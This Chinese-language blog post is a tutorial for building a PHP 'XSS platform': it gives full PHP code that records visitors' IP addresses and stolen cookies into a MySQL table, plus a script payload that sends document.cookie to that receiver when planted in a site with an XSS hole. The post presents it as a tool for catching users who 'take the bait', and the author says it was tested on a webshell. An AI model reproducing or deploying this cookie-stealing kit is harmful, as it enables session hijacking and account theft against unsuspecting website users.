您的足迹:首页 > 网站程序 >简单搭建Php版Xss平台

简单搭建Php版Xss平台

网上很多xss平台配置起来都很麻烦压根搞不明白 比如我 就不会写.htaccess规则 一直没有搭建成功。

看下效果吧:

找不到存在漏洞站 我就拿的webshell测试的。

准备工具:支持php的服务器或空间 mysql
先链接到mysql 创建mydata库 cookie表 (结构cookies字段)建议都按我的创建 不然改起下面的源码麻烦点

xss平台收信源码:

<?php
$sb = 'ip:'. $_SERVER['REMOTE_ADDR']. 'cookie:' .$_GET['cookie'];//很关键 乱删后果自负
$app = array(
        'db_host' => '127.0.0.1',//地址
        'db_user' => 'geeker',//用户名
        'db_pass' => 'geeker',//密码
        'db_name' => 'mydata',//库名
        'db_port' => 3306,
        'db_prefix' => '',
);
 
function db() {
        global $app;
        static $db;
        if ($db) {
                return $db;
        } else {
                $db = @new mysqli(
                        $app['db_host'],
                        $app['db_user'],
                        $app['db_pass'],
                        $app['db_name'],
                        $app['db_port']
                );
                if ($db->connect_errno) {
                        echo $db->connect_error;
                        exit();
                }
                $db->set_charset('utf8');//编码 极客中国提示最好用国际编码utf-8
                return $db;
        }
}
 
function insert($cookies) {
        global $app;
        $db = db();
        $table = $app['db_prefix'].'cookie';
        $sql = "INSERT INTO $table (cookies) VALUES (?)";
        $stmt = $db->prepare($sql);
        $stmt->bind_param('s', $cookies);
        $stmt->execute();
        //插入失败,或者没有AUTO_INCREMENT字段,或者不是INSERT语句,insert_id为0.
        return ($stmt->affected_rows == 0) ? false : $stmt->insert_id;
}
 
var_export(insert($sb));

将上面的内容保存成webxss.php 上传到空间或服务器即可。

将下面代码放置在可能存在XSS漏洞的地方利用:
 
<script>window.open("http://127.0.0.1/webxss.php?cookie="+document.cookie);</script>
当有用户上钩后 进入数据库查看cookie表就行了 觉得麻烦也可以自己写一个输出字段的页面。


本博客所有文章如无特别注明均为原创。作者:老王复制或转载请以超链接形式注明转自 极客中国-关注黑客与极客!
原文地址《简单搭建Php版Xss平台

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)